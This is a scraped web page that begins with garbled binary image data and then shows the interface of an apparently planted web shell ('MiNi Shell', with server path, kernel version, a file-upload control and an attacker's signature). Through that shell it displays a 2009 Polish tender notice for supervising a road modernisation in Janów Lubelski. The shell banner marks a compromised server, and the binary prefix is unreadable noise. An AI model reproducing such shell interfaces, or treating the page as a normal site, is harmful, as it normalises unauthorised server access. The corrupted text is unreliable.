JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090723/251108-N-2009.html

<p class="kh_header"><b>Janów Lubelski: Pełnienie nadzoru inwestorskiego nad realizacją zadania pod nazwą modernizacja (przebudowa) drogi powiatowej Nr 2808L Janów Lubelski (ul. Bialska) - Tokary - Huta Turobińska odcinek Rataj - Zdziłowice w lokalizacji od km 5+002 do km 12+800</b><br>
<b>Numer ogłoszenia: 251108 - 2009; data zamieszczenia: 23.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Bohaterów Porytowego Wzgórza 29, 23-300 Janów Lubelski, woj. lubelskie, tel. 015 8720266, faks 015 8720191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ebip.lublin.pl/zdpjanow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania pod nazwą modernizacja (przebudowa) drogi powiatowej Nr 2808L Janów Lubelski (ul. Bialska) - Tokary - Huta Turobińska odcinek Rataj - Zdziłowice w lokalizacji od km 5+002 do km 12+800.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest pełnienie nadzoru inwestorskiego nad realizacją zadania pod nazwą modernizacja (przebudowa) drogi powiatowej Nr 2808L Janów Lubelski (ul. Bialska) - Tokary - Huta Turobińska, odcinek Rataj - Zdziłowice w lokalizacji od km 5+002 do km 12+800.
2.Wykonanie przedmiotu zamówienia obejmuje między innymi:
1)pełnienie Nadzoru inwestorskiego nad Kontraktem
2)zarządzanie i koordynację realizacji Kontraktu,
3)pełnienie nadzoru geodezyjnego, archeologicznego i laboratoryjnej kontroli,
4)nadzór nad realizacją ewentualnych robót poprawkowych w okresie trwania gwarancji.

W ramach kontroli realizacji budowy Wykonawca  zobowiązany jest zapewnić na koszt własny badania laboratoryjne w zakresie:
a)badania kwalifikacyjne gruntów - minimum szt. 8
b)badanie kruszyw na podbudowę - minimum szt. 3 
c)badania mas z nawierzchni (warstwa wiążąca i ścieralna) - minimum szt. 16
d)pomiar równości warstwy ścieralnej - km 7,8

3.Szczegółowy opis przedmiotu zamówienia znajduje się w tomie III SIWZ.
4.Szczegółowy zakres nadzorowanych robót został ujęty w Przedmiarze robót, stanowiącym załącznik do SIWZ oraz w Tomie III Specyfikacji Istotnych Warunków Zamówienia. 
5.Realizacja przedmiotu zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 roku Prawo budowlane (tekst jednolity Dz.U. z 2006 r. Nr 156, poz. 1118 z późniejszymi zmianami).
6.Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji przedmiotu zamówienia i w jego okolicy w celu dokonania oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.
7.Wymagana jest obecność pracowników Wykonawcy na budowie przez okres prowadzenia robót, oraz na każde wezwanie inwestora, także w okresie gwarancyjnym. Niedopuszczalne jest doprowadzenie do sytuacji powodującej przerwy w robotach z tytułu nieobecności pracowników Wykonawcy na budowie.
8.Zamawiający nie dopuszcza składania ofert częściowych. Oferty składane w niniejszym postępowaniu muszą obejmować całość zamówienia.
9.Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
10.Wykonawca zobowiązany jest wskazać w ofercie zakres usług, których wykonanie zamierza powierzyć podwykonawcom. 
11.Z uwagi na specyfikę przedmiotu zamówienia podwykonawcom nie może zostać powierzony nadzór inwestorski w zakresie branży drogowej.
12.Wymagany okres gwarancji jakości dla usługi objętej zamówieniem wynosi 60 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.35.19.14-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 5 000,00 zł. (słownie: pięć tysięcy złotych). Wadium musi być wniesione przed upływem terminu składania ofert w formie określonej w art. 45 ust 6 ustawy Prawo zamówień publicznych. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone wraz z ofertą w oryginale i musi obejmować cały okres związania ofertą. Wadium wnoszone w pieniądzu winno być wpłacone przelewem na rachunek bankowy w PKO BP oddział Janów Lubelski Nr 64 1020 3235 0000 5702 0036 1329, w takim czasie, aby kwota wadium w terminie składania ofert znajdowała się na tym koncie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Prawo zamówień publicznych oraz posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.
1.2.1.Wykonawca w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował (zakończył) jako wykonawca lub podwykonawca, co najmniej jeden nadzór inwestorski odpowiadający swoim rodzajem (przez nadzór inwestorski odpowiadający swoim rodzajem przedmiotowi zamówienia należy rozumieć nadzór inwestorski nad budową lub przebudową drogi klasy G lub wyższej długości minimum 7,8 km) i wartością nadzorowi inwestorskiemu stanowiącemu przedmiot zamówienia (wartość wykonanego nadzoru, co najmniej równy cenie oferty). Dopuszcza się spełnienie powyższego warunku w ramach dwóch zadań łącznie. 
1.2.2.Wykonawca dysponuje jednostkami sprzętowymi wymienionymi poniżej lub przedstawi pisemne zobowiązanie innych podmiotów do ich udostępnienia
1)Laboratorium umożliwiające dokonanie pomiarów kontrolnych,
2)Sprzęt geodezyjno-pomiarowy umożliwiający dokonanie obmiarów i pomiarów kontrolnych.
1.2.3.Wykonawca dysponuje osobami legitymującymi się kwalifikacjami i doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia tych osób:
-Inspektor nadzoru - osoba proponowana do pełnienia tej funkcji musi być wpisana na listę członków właściwej izby samorządu zawodowego zgodnie z przepisami ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych, architektów, inżynierów budownictwa oraz urbanistów w zakresie prawa do pełnienia samodzielnych funkcji w budownictwie w specjalności: uprawnienia wykonawcze drogowe lub konstrukcyjno budowlane bez ograniczeń właściwe dla przedmiotu zamówienia i posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w związku z pełnieniem niniejszej funkcji, musi posiadać minimum 5 lat doświadczenia zawodowego w wykonawstwie robót drogowych lub nadzorach inwestorskich polegających na budowie lub przebudowie drogi klasy co najmniej G długości minimum 7,8 km i wartości netto minimum 10 000 000 zł (dopuszcza się spełnienie powyższego warunku w ramach jednego lub dwóch zadań łącznie),
-Geodeta - osoba proponowana do pełnienia obowiązków geodety musi posiadać uprawnienia w zakresie rozgraniczenia i podziału nieruchomości (gruntów) oraz sporządzania dokumentacji do celów prawnych (uprawnienia geodezyjne w zakresie obsługi inwestycji), musi posiadać minimum 4 lata doświadczenia zawodowego w pełnieniu nadzoru geodezyjnego nad robotami budowlanymi.
-Archeolog - osoba proponowana musi posiadać uprawnienia określone przepisami prawa do pełnienia nadzoru archeologicznego przy robotach ziemnych oraz posiadać minimum dwu letnie doświadczenie zawodowe w pełnieniu nadzoru archeologicznego nad robotami ziemnymi.

1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.
1.3.1.Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia na wartość, co najmniej 100 000,00 zł.
2.W przypadku wykonawców wspólnie ubiegających się o zamówienie (spółki cywilne/konsorcja), żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 ustawy Prawo zamówień publicznych, a warunki określone w pkt. 1.2. i 1.3 muszą spełniać łącznie.
3.Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie art. 24 ustawy Prawo zamówień publicznych. Podstawą oceny spełnienia warunków będą w szczególności wymagane dokumenty i oświadczenia, o których mowa w pkt 8 Instrukcji dla wykonawców, na zasadzie spełnia/ nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych oraz posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, Wykonawcy powinni przedłożyć niżej wymienione dokumenty: 
1.1.Oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z treścią Formularza 3.1.Specyfikacji Istotnych Warunków Zamówienia;
1.2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.3.Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.4.Aktualna informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
1.5.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

2.W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Wykonawcy winni przedłożyć następujące dokumenty:
2.1.Wykaz wykonanych nadzorów inwestorskich w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością nadzorowi inwestorskiemu stanowiącemu przedmiot zamówienia na formularzu zgodnym z treścią Formularza 3.2. Wykaz musi potwierdzać spełnienie przez Wykonawcę warunku określonego w pkt 1.2.1. Do wykazu należy dołączyć dokumenty potwierdzające, że wymienione w wykazie nadzory inwestorskie zostały wykonane należycie;
2.2.Wykaz jednostek sprzętowych, którymi dysponuje lub będzie dysponował Wykonawca, wymaganych dla realizacji przedmiotu zamówienia, na formularzu zgodnym z treścią Formularza 3.3. Wykaz musi potwierdzać spełnienie przez Wykonawcę warunku określonego w pkt 1.2.2. W przypadku, gdy Wykonawca wskaże w przedmiotowym wykazie jednostki sprzętowe, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych jednostek; 
2.3.Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, na formularzu zgodnym z treścią Formularza 3.4 i załącznika do tego formularza. Wykaz musi zawierać dane dotyczące kwalifikacji wskazanych osób potwierdzających spełnienie warunku określonego w pkt 1.2.3. W przypadku, gdy Wykonawca wskaże w wykazie osoby, którymi będzie dysponował, musi załączyć pisemne zobowiązanie innych podmiotów do udostępnienia tych osób.

3.W celu potwierdzenia spełnienia przez Wykonawcę warunku opisanego w pkt 1.3., Wykonawcy powinni przedłożyć następujące dokumenty: 
3.1.Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, a tym działalności zgodnej z przedmiotem niniejszego zamówienia, na kwotę nie mniejszą niż określona w pkt 1.3.1. 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
1)zamiast dokumentów, o których mowa w pkt. 1 ppkt. 1.2., 1.4. i 1.5. składa dokument lub dokumenty, wystawione w kraju, w którym ma on siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
-nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 
-nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2)zamiast dokumentów o których mowa w pkt. 1 ppkt. 1.3. składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych.
5.Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 4., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty, o których mowa w punkcie 4 i 5, powinny być wystawione nie wcześniej niż odpowiadające im dokumenty określone w pkt 1.2 ÷ 1.5.
6.W celu potwierdzenia spełnienia warunków wymaganych od Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
6.1.Oświadczenie wymienione w pkt. 1 ppkt 1.1. winno być złożone w imieniu wszystkich wykonawców składających wspólną ofertę;
6.2.Dokumenty wymienione w pkt. 1 ppkt 1.2.÷ 1.5., albo odpowiadające im określone w pkt 4 i 5, powinny być złożone przez każdego Wykonawcę;
6.3.Dokumenty wymienione w pkt 2 i 3, winien złożyć w imieniu wszystkich ten, lub ci spośród wykonawców składających wspólną ofertę, w stosunku, do których z niniejszej Specyfikacji Istotnych Warunków Zamówienia lub umowy regulującej zasady współpracy wynika, że winni potwierdzić spełnienie warunku.

7.Dokumenty i oświadczenia wymagane dla potwierdzenia spełnienia przez Wykonawców warunków winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu (np. wraz z imienna pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem). Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.
8.Wartości podane w dokumentach w walutach innych niż złotych polskich będą przeliczone przez Zamawiającego w następujący sposób:
8.1.Doświadczenie Wykonawcy i inspektora nadzoru wg średniego kursu NBP z dnia podpisania kontraktu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdpjanow.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Janowie Lubelskim ul. Bohaterów Porytowego Wzgórza 29, pokój nr 24.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2009 godzina 09:30, miejsce: Zarząd Dróg Powiatowych w Janowie Lubelskim ul. Bohaterów Porytowego Wzgórza 29, pokój nr 24.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest finansowane ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 i środków budżetu Powiatu Janowskiego będących w dyspozycji Zarządu Dróg Powiatowych w Janowie Lubelskim.
Nr referencyjny nadany postępowaniu: ZDP-J/IiN/342/11/09
Na podstawie art. 27 ustawy Prawo zamówień publicznych oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie. Zamawiający dopuszcza również przekaz w/w dokumentów oraz informacji faksem, pod warunkiem niezwłocznego ich pisemnego potwierdzenia (dostarczenia osobiście lub niezwłoczne przesłanie drogą pocztową). 
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. 
Zamawiający wyznacza do kontaktowania się z Wykonawcami: Barbara Łukasz, tel. (015) 8720266 wew. 21 i Grzegorz Rachwał tel. (015) 8720266 wew. 15.

Creat By MiNi SheLL
Email: jattceo@gmail.com